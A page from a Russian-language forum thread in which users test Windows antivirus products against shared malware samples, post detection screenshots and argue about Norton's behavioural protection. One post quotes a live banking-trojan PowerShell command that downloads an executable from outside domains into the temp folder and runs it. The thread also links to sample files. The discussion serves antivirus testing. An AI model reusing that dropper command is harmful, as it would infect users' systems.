Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Компьютеры » Программы » Обзор и тестирование антивирусов под Windows (часть 12)

Модерирует : gyra, Maz

gyra (16-03-2018 18:07): Обзор и тестирование антивирусов под Windows (часть 13)  Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203

   

gyra

Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Обзор и тестирование антивирусов

и других средств безопасности на их основе
под Windоws 98/XP/Vista/7/8/8.1/10


Закрываемся от вируса-шифровальщика WannaCry
Карта распространения WannaCry в реальном времени | Ещё карта
Правила публикации ссылок на образцы | Правила проведения и оформления тестов...
Хостинги для скриншотов | Online-сервисы для комплексного анализа подозрительных файлов
Основные вендоры антивирусной индустрии... | Таблица
Отправка подозрительных файлов одновременно всем вендорам...
Более или менее независимые тестовые лаборатории антивирусных решений
Набор поведенческих онлайн анализаторов
AVZ | AdwCleaner — дополнение к стационарным антивирусам
Антивирусы не требующие инсталяции | Смежные темы на Ru-Board

Всего записей: 7932 | Зарегистр. 18-02-2006 | Отправлено: 11:06 29-10-2017 | Исправлено: molchel, 11:34 25-01-2018
alexgrits

Gold Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
подозрительные ссылки  

KIS2013 блокирует как фишинговые ссылки

 

Всего записей: 7307 | Зарегистр. 23-11-2011 | Отправлено: 15:39 07-12-2017 | Исправлено: alexgrits, 15:41 07-12-2017
Gall



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
подозрительные ссылки

первая ссылка - скачался объект и сразу после скачивания был обнаружен Нортоном

вторая ссылка  

третья ссылка - так же как и первая


Всего записей: 2358 | Зарегистр. 23-01-2017 | Отправлено: 15:41 07-12-2017
Maks_I



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Maks_I  
Принцип работы Sonar основан на контроле изменений в системе!

На контроле изменений в системе основана проактивка любого антивируса, в котором она есть. Естественно на этом основан и SONAR. Только это не значит, что контроль за изменением параметров DNS и хост-файла можно назвать Анализом поведения.

Цитата:
Ну и собственно ваш детский сад с кучей антивирусов,это уже ненормальность

давайте я сам буду решать, где ненормальность, а где нет. заботьтесь о проблемах своего ав.

Всего записей: 2497 | Зарегистр. 05-09-2017 | Отправлено: 15:43 07-12-2017 | Исправлено: Maks_I, 15:44 07-12-2017
haze89

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
_https://www.upload.ee/files/7742216/nqp.exe.html

WD
Запуск - срабатывает smartscreen:
http://jpegshare.net/cd/e2/cde2fb1bfbffb98d32b519f4e4978fe6.jpg.html
Выполняю в любом случае - nqp пытается изменить что-то на раб. столе. Защитник помещает его в карантин:
http://jpegshare.net/68/87/68874b0387ff209a8b971ee79bd2591f.jpg.html
но требует перезапуска устройства:
http://jpegshare.net/a2/6b/a26b06c27d9f43fb7dea6389c462b1e5.jpg.html
Делаю перезагрузку ОС - никаких подозрительных действий не замечено.
 
Zemana AntiMalware:
http://jpegshare.net/ad/ad/adad72ad79f88176a258e2169ed67c4e.jpg.html
HitmanPro:
http://jpegshare.net/ca/4a/ca4a3dc3fc4e35e59245e9d662f642d6.jpg.html

Всего записей: 1624 | Зарегистр. 21-11-2017 | Отправлено: 15:48 07-12-2017 | Исправлено: haze89, 16:05 07-12-2017
Gall



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
На контроле изменений в системе основана проактивка любого антивируса, в котором она есть. Естественно на этом основан и SONAR. Только это не значит, что изменение параметров DNS и хост-файла можно назвать Анализом поведения.  
 

Теперь вы уже заговорили про ОБЩУЮ проактивку.до этого были эвристика,эмуляция.Вы уже совсем запутались в своих показаниях!СУТЬ пойми,что SONAR - это поведенческий анализатор,а не просто эвристика!
 

Цитата:
давайте я сам буду решать, где ненормальность, а где нет. заботьтесь о проблемах своего ав.
 

Вам никто не запрещает решать,чем вам пользоваться.Я лишь указал на то,что согласен про антивирусное ассорти.

Всего записей: 2358 | Зарегистр. 23-01-2017 | Отправлено: 15:52 07-12-2017
Maks_I



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
СУТЬ пойми,что SONAR - это поведенческий анализатор,а не просто эвристика!  

Это полная чепуха. Заявляю это ответственно! Если бы там был нормальный поведенческий анализатор,  три шифратора в этом году не прошли бы.

Всего записей: 2497 | Зарегистр. 05-09-2017 | Отправлено: 16:00 07-12-2017
Gall



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Это полная чепуха. Заявляю это ответственно! Если бы там был нормальный поведенческий анализатор,  три шифратора в этом году не прошли бы.

Чепуха - это твои сообщения!Знаем тебя на комсс,как бла-бла-бла...Пропускают все без исключения.И Каспер,и Эсет,и Доктор,и Бит!Я с Нортоном пока что не пропустил ни одного шифратора.Скрины все тут.И уж получше знаю,как работает Нортон,в отличии от вас,ибо пользуюсь.А вот ваши слова и утверждения вызывают недоверие.

Всего записей: 2358 | Зарегистр. 23-01-2017 | Отправлено: 16:12 07-12-2017
haze89

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
подозрительные ссылки

BIS18
 
1 ссылка:
http://jpegshare.net/4b/04/4b0470ee8b09744525219a328cc6dbd6.jpg.html
 
2 ссылка:
Блокирует ublock origin:
http://jpegshare.net/7d/f0/7df0e477625554a09024fd399ac1bc7d.jpg.html
Временно отключаю блокировку:
http://jpegshare.net/76/00/7600833694261abf3f8676f3a277a475.jpg.html
Похоже из-за ublock сломалась HTML разметка.
 
3 ссылка:
http://jpegshare.net/68/78/6878f07fa6673911ad047539b61f38a5.jpg.html

Всего записей: 1624 | Зарегистр. 21-11-2017 | Отправлено: 16:13 07-12-2017 | Исправлено: haze89, 16:16 07-12-2017
OldSirius

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
#banker
 
 
 
Добавлено:
Интересный факт, данный банкер, пытается задать исключения для свой папки, в WD)
 

Всего записей: 1827 | Зарегистр. 14-01-2011 | Отправлено: 16:34 07-12-2017
Maks_I



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Чепуха - это твои сообщения!Знаем тебя на комсс,как бла-бла-бла...

Так это значит ты и есть, он же Гал, он же Димэн. Ну так теперь знай, что и здесь тебе от меня будет полный игнор. Можешь продолжать выдавать свои безграмотные россказни.

Всего записей: 2497 | Зарегистр. 05-09-2017 | Отправлено: 16:51 07-12-2017
alexgrits

Gold Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
#banker

Comodo на страже информационной безопасности

Всего записей: 7307 | Зарегистр. 23-11-2011 | Отправлено: 16:56 07-12-2017
haze89

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
#banker

BIS18
Открываю, разрешаю редактирование, пробую что-нибудь напечатать, закрываю документ:
http://jpegshare.net/90/8a/908a84ec9c4cbf9380a8dab58cb98041.jpg.html

Всего записей: 1624 | Зарегистр. 21-11-2017 | Отправлено: 17:07 07-12-2017 | Исправлено: haze89, 17:07 07-12-2017
Gall



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Так это значит ты и есть, он же Гал, он же Димэн. Ну так теперь знай, что и здесь тебе от меня будет полный игнор. Можешь продолжать выдавать свои безграмотные россказни.

Это ничего не значит ШерлокА игнор твой мне как-то побоку.Твои сказки про антивирусы на комсс известны многим.Теперь ты решил ещё и тут троллить,выдавая свои бредни за ответственные утверждения.Да ты и сам писал на комсс,что любитель приврать

Всего записей: 2358 | Зарегистр. 23-01-2017 | Отправлено: 17:11 07-12-2017
molchel



Gold Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
#banker  
 

ESET IS11, ловит при закрытии файла:

 


----------
- Помним. Скорбим -

Всего записей: 7392 | Зарегистр. 04-12-2012 | Отправлено: 17:18 07-12-2017
OldSirius

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
BIS18

haze89
А вот фришный бит, немного по другому срабатывает проактивкой) сразу блочит powershell
 

Всего записей: 1827 | Зарегистр. 14-01-2011 | Отправлено: 17:18 07-12-2017
haze89

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
OldSirius, интересно По идее же должны одинаково отработать

Всего записей: 1624 | Зарегистр. 21-11-2017 | Отправлено: 17:23 07-12-2017
OldSirius

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
haze89
ну как бы да)

Всего записей: 1827 | Зарегистр. 14-01-2011 | Отправлено: 17:26 07-12-2017
AlexeyK

Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
OldSirius
Валерий, привет! А PowerShell после этой блокировки вообще работает?))

Всего записей: 198 | Зарегистр. 27-06-2017 | Отправлено: 17:30 07-12-2017
OldSirius

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
AlexeyK
Привет, Алексей, конечно)) блокируется сценарий выполнения, а не само приложение) это же системное, кто же его заблокирует)) вот как это выглядит.
 

Цитата:
PowerShell "function noinorevgbwf([String] $adpgcmk){(New-Object System.Net.WebClient).DownloadFile($adpgcmk,'%TEMP%\cby_v_hgjyav.exe');Start-Process 'C:\Users\%USERNAME%\AppData\Local\Temp\cby_v_hgjyav.exe';}try{noinorevgbwf('http://aperhu.com/ser0712.png')}catch{noinorevgbwf('http://altarek.com/ser0712.png')}

 
 
 
Добавлено:
вот, живёхонький)
 

Всего записей: 1827 | Зарегистр. 14-01-2011 | Отправлено: 17:35 07-12-2017
haze89

Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
#banker

WD
Распаковка:
http://jpegshare.net/1f/c6/1fc66bcdef64eb832e3cb5cb1a0eb69f.jpg.html

Всего записей: 1624 | Зарегистр. 21-11-2017 | Отправлено: 17:45 07-12-2017
   

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203

Компьютерный форум Ru.Board » Компьютеры » Программы » Обзор и тестирование антивирусов под Windows (часть 12)
gyra (16-03-2018 18:07): Обзор и тестирование антивирусов под Windows (часть 13)


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru